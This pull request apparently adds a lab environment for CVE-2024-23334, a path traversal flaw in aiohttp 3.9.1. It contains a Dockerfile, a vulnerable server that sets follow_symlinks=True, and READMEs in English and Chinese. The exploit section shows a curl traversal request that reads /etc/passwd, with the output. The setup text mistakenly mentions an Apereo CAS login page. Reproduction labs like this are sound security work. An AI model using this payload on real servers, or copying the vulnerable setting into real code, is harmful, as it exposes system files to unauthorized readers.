### PR TITLE
CVE-2024-23334

### DIFF
--- a/aiohttp/CVE-2024-23334/Dockerfile
+++ b/aiohttp/CVE-2024-23334/Dockerfile
@@ -1,0 +1,8 @@
+FROM python:3.11
+LABEL maintainer="phithon <root@leavesongs.com>"
+WORKDIR /app
+RUN mkdir "static"
+RUN pip install aiohttp==3.9.1
+COPY main.py main.py
+EXPOSE 8080
+CMD [ "python" ,"main.py" ]

--- a/aiohttp/CVE-2024-23334/README.md
+++ b/aiohttp/CVE-2024-23334/README.md
@@ -1,0 +1,71 @@
+# CVE-2024-23334 Path Traversal
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and
+configuring static routes, it is necessary to specify the root path for static files. Additionally, the option '
+follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When '
+follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This
+can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even
+when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version
+3.9.2 fixes this issue.
+Reference:
+
+- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b
+- https://github.com/aio-libs/aiohttp/pull/8079
+- https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f
+- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/
+- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/
+
+## Environment Setup
+
+- Vulnerable code
+
+```python
+# examples/server_simple.py
+from aiohttp import web
+
+app = web.Application()
+app.router.add_routes([
+    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
+])
+
+if __name__ == '__main__':
+    web.run_app(app)
+
+# 访问 https://www.jetbrains.com/help/pycharm/ 获取 PyCharm 帮助
+
+```
+
+Execute following commands to start an aiohttp:3.9.1 ：
+
+```
+docker compose up -d
+```
+
+After the Apereo CAS is started, visiting `http://your-ip:8080/cas/login` to see the login page.
+
+## Exploit
+
+```bash
+➜  CVE-2024-23334 git:(master) ✗ curl --path-as-is http://172.17.0.2:8080/static/../../../../../etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+
+```

--- a/aiohttp/CVE-2024-23334/README.zh-cn.md
+++ b/aiohttp/CVE-2024-23334/README.zh-cn.md
@@ -1,0 +1,67 @@
+# CVE-2024-23334 目录穿越
+
+aiohttp是一个用于asyncio和Python的异步HTTP客户端/服务器框架。当使用aiohttp作为web服务器并配置静态路由时，有必要指定静态文件的根路径。此外，选项`follow_symlinks`
+可用于确定是否遵循静态根目录之外的符号链接。当`follow_symlinks`设置为`True`
+时，不需要验证读取文件是否在根目录中。这可能导致目录遍历漏洞，导致未经授权访问系统上的任意文件，即使不存在符号链接。禁用`follow_symlinks`
+和可使用反向代理缓解措施。3.9.2版修复了此问题。
+
+参考链接：
+
+- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b
+- https://github.com/aio-libs/aiohttp/pull/8079
+- https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f
+- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/
+- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/
+
+## 环境搭建
+
+- 存在漏洞的代码
+
+```python
+# examples/server_simple.py
+from aiohttp import web
+
+app = web.Application()
+app.router.add_routes([
+    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
+])
+
+if __name__ == '__main__':
+    web.run_app(app)
+
+# 访问 https://www.jetbrains.com/help/pycharm/ 获取 PyCharm 帮助
+
+```
+
+执行如下命令启动一个aiohttp:3.9.1：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/cas/login`即可查看到登录页面。
+
+## 漏洞复现
+
+```bash
+➜  CVE-2024-23334 git:(master) ✗ curl --path-as-is http://172.17.0.2:8080/static/../../../../../etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+
+```

--- a/aiohttp/CVE-2024-23334/docker-compose.yml
+++ b/aiohttp/CVE-2024-23334/docker-compose.yml
@@ -1,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/aiohttp:3.9.1
+   ports:
+    - "8080:8080"

--- a/aiohttp/CVE-2024-23334/main.py
+++ b/aiohttp/CVE-2024-23334/main.py
@@ -1,0 +1,12 @@
+# examples/server_simple.py
+from aiohttp import web
+
+app = web.Application()
+app.router.add_routes([
+    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
+])
+
+if __name__ == '__main__':
+    web.run_app(app)
+
+# 访问 https://www.jetbrains.com/help/pycharm/ 获取 PyCharm 帮助


### PR DESCRIPTION
# CVE-2024-23334 目录穿越

aiohttp是一个用于asyncio和Python的异步HTTP客户端/服务器框架。当使用aiohttp作为web服务器并配置静态路由时，有必要指定静态文件的根路径。此外，选项`follow_symlinks`
可用于确定是否遵循静态根目录之外的符号链接。当`follow_symlinks`设置为`True`
时，不需要验证读取文件是否在根目录中。这可能导致目录遍历漏洞，导致未经授权访问系统上的任意文件，即使不存在符号链接。禁用`follow_symlinks`
和可使用反向代理缓解措施。3.9.2版修复了此问题。

参考链接：

- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b
- https://github.com/aio-libs/aiohttp/pull/8079
- https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/

## 环境搭建

- 存在漏洞的代码

```python
# examples/server_simple.py
from aiohttp import web

app = web.Application()
app.router.add_routes([
    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

if __name__ == '__main__':
    web.run_app(app)

# 访问 https://www.jetbrains.com/help/pycharm/ 获取 PyCharm 帮助

```

执行如下命令启动一个aiohttp:3.9.1：

```
docker compose up -d
```

环境启动后，访问`http://your-ip:8080/cas/login`即可查看到登录页面。

## 漏洞复现

```bash
➜  CVE-2024-23334 git:(master) ✗ curl --path-as-is http://172.17.0.2:8080/static/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

```
